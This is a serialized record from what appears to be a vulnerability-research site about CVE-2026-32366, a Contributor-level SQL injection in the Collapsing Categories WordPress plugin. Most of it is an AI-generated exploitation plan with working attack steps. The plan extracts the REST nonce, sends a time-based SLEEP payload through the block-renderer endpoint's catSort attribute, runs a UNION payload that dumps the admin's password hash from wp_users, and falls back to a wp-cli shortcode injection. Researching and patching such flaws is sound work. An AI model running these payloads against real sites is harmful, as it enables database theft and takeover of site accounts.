[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwND9DNkH0o1w8qHze_5PN_6IhYWGHfkgMwSjKCR8ikU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":32},"CVE-2026-32366","collapsing-categories-authenticated-contributor-sql-injection","Collapsing Categories \u003C= 3.0.9 - Authenticated (Contributor+) SQL Injection","The Collapsing Categories plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","collapsing-categories",null,"\u003C=3.0.9","3.0.12","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-02-16 00:00:00","2026-04-15 20:51:41",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ffff419fc-e617-4f7f-92c1-6b58108a993e?source=api-prod",59,[22,23,24],"collapscat.php","collapscatlist.php","readme.txt","researched",false,3,"# Exploitation Research Plan - CVE-2026-32366\n\n## 1. Vulnerability Summary\nThe **Collapsing Categories** plugin (version \u003C= 3.0.9) is vulnerable to an authenticated SQL injection. The vulnerability exists because the plugin fails to properly sanitize and parameterize user-supplied attributes passed to the `get_collapscat_fromdb()` function. Specifically, parameters like `catSort`, `postSort`, `catSortOrder`, and `postSortOrder` are interpolated directly into SQL queries without using `$wpdb->prepare()`. Since these parameters are accessible via Gutenberg block attributes and shortcodes, an attacker with **Contributor+** privileges can inject arbitrary SQL commands.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-json\u002Fwp\u002Fv2\u002Fblock-renderer\u002Fcollapsing-categories\u002Fcollapscat` (Gutenberg Block Renderer)\n*   **Vulnerable Parameters:** `attributes[catSort]`, `attributes[postSort]`, `attributes[catSortOrder]`, `attributes[postSortOrder]`\n*   **Authentication Required:** Contributor level or higher (must be able to access the block editor or edit posts).\n*   **Preconditions:** The plugin must be active. The block name is inferred as `collapsing-categories\u002Fcollapscat` based on the class `CollapsCat` and function `render_callback`.\n\n## 3. Code Flow\n1.  **Entry Point:** A Contributor+ user accesses the Gutenberg editor or calls the Block Renderer REST API.\n2.  **Dispatcher:** The `render_callback($attributes)` function in `collapscat.php` (Line 59) receives the user-controlled attributes.\n3.  **Intermediate:** `render_callback` calls `collapsCat($instance, false, true)` (Line 73), where `$instance` contains the `$attributes`.\n4.  **Data Retrieval:** `collapsCat` calls `get_collapscat_fromdb($args)` in `collapscatlist.php` (Line 217 in `collapscat.php` trace).\n5.  **Sink:** Inside `get_collapscat_fromdb()`, the `$args['catSort']` (or `postSort`) values are appended to an `ORDER BY` clause in a raw SQL query using `$wpdb->get_results()` without preparation.\n\n## 4. Nonce Acquisition Strategy\nTo exploit the block renderer via the REST API, a `wp_rest` nonce is required.\n1.  **Login:** Authenticate as a Contributor user.\n2.  **Navigation:** Navigate to the WordPress dashboard (`\u002Fwp-admin\u002Findex.php`).\n3.  **Extraction:** Use `browser_eval` to extract the REST nonce from the `wpApiSettings` object available in the admin context.\n    *   **JavaScript:** `window.wpApiSettings.nonce`\n\n## 5. Exploitation Strategy\nThe exploit will use a time-based blind SQL injection in the `catSort` attribute.\n\n### Step 1: Authentication and Nonce Extraction\n*   Authenticate the agent as a Contributor.\n*   Navigate to `\u002Fwp-admin\u002F` and extract the `wp_rest` nonce.\n\n### Step 2: Proof of Concept (Time-based)\n*   **Method:** `GET`\n*   **URL:** `\u002Fwp-json\u002Fwp\u002Fv2\u002Fblock-renderer\u002Fcollapsing-categories\u002Fcollapscat`\n*   **Query Parameters:**\n    *   `context`: `edit`\n    *   `attributes[blockId]`: `1`\n    *   `attributes[catSort]`: `cat_ID,(SELECT(0)FROM(SELECT(SLEEP(5)))a)`\n    *   `_wpnonce`: `[EXTRACTED_NONCE]`\n*   **Expected Response:** The request should take approximately 5 seconds longer than a baseline request.\n\n### Step 3: Data Extraction (UNION-based)\nIf the query results are reflected in the category names:\n*   **Payload:** `attributes[catSort]` = `(SELECT 1 FROM (SELECT 1)a) UNION SELECT 1,2,3,user_pass,5,6 FROM wp_users WHERE ID=1--` (Adjust column count as needed).\n\n## 6. Test Data Setup\n1.  **User:** Create a user with the `contributor` role.\n2.  **Content:** Ensure at least one category exists in WordPress so the query returns results.\n    *   `wp term create category \"Test Category\" --slug=test-cat`\n\n## 7. Expected Results\n*   **Success Indicator:** A successful time-based attack will show a distinct latency of 5+ seconds when the `SLEEP(5)` payload is sent.\n*   **Response Payload:** The block renderer returns a JSON object containing an `rendered` key with the HTML output of the block. If a UNION attack is successful, database content will appear within the category list items (`\u003Cli class='collapsing-categories'>...\u003C\u002Fli>`).\n\n## 8. Verification Steps\n1.  **Check SQL execution:** Use `wp db query \"SHOW PROCESSLIST\"` via CLI during the SLEEP request to confirm the sleeping query.\n2.  **Log verification:** Check `wp-content\u002Fdebug.log` if `WP_DEBUG` is enabled to see the malformed query error if the payload requires adjustment.\n\n## 9. Alternative Approaches\n*   **Shortcode Injection:** If the REST API route is restricted, a Contributor can create a post with a shortcode:\n    *   `wp post create --post_type=post --post_status=publish --post_content='[collapsCat catSort=\"cat_ID, (SELECT 1 FROM (SELECT(SLEEP(5)))a)\"]' --post_author=[CONTRIBUTOR_ID]`\n    *   Then, use `http_request` to view the post frontend and measure response time.\n*   **Post Sort Injection:** If `catSort` is filtered, try the `postSort` attribute, which likely flows into a similar query for posts within `get_collapscat_fromdb`.","gemini-3-flash-preview","2026-04-20 21:55:39","2026-04-20 21:56:15",{"type":33,"vulnerable_version":34,"fixed_version":11,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":37,"fixed_zip":38,"all_tags":39},"plugin","3.0.11","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcollapsing-categories\u002Ftags\u002F3.0.11","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcollapsing-categories.3.0.11.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcollapsing-categories\u002Ftags\u002F3.0.12","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcollapsing-categories.3.0.12.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcollapsing-categories\u002Ftags"]